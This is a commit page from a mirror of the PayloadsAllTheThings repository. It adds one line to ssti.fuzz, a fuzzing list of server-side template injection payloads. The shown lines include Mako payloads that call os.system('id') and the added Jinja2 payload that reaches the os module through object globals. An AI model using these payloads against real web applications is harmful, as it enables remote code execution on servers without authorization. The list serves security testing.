mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Update ssti.fuzz
This commit is contained in:
parent
bb65411c62
commit
8482f742ff
1 changed files with 1 additions and 0 deletions
|
@ -100,3 +100,4 @@ ${self.context._with_template.module.filters.compat.inspect.os.system("id")}
|
|||
${self.context._with_template.module.runtime.compat.inspect.os.system("id")}
|
||||
${self.context._with_template.module.runtime.exceptions.util.os.system("id")}
|
||||
${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
|
||||
{{self._TemplateReference__context.cycler.__init__.__globals__.os}}
|
||||
|
|
Loading…
Reference in a new issue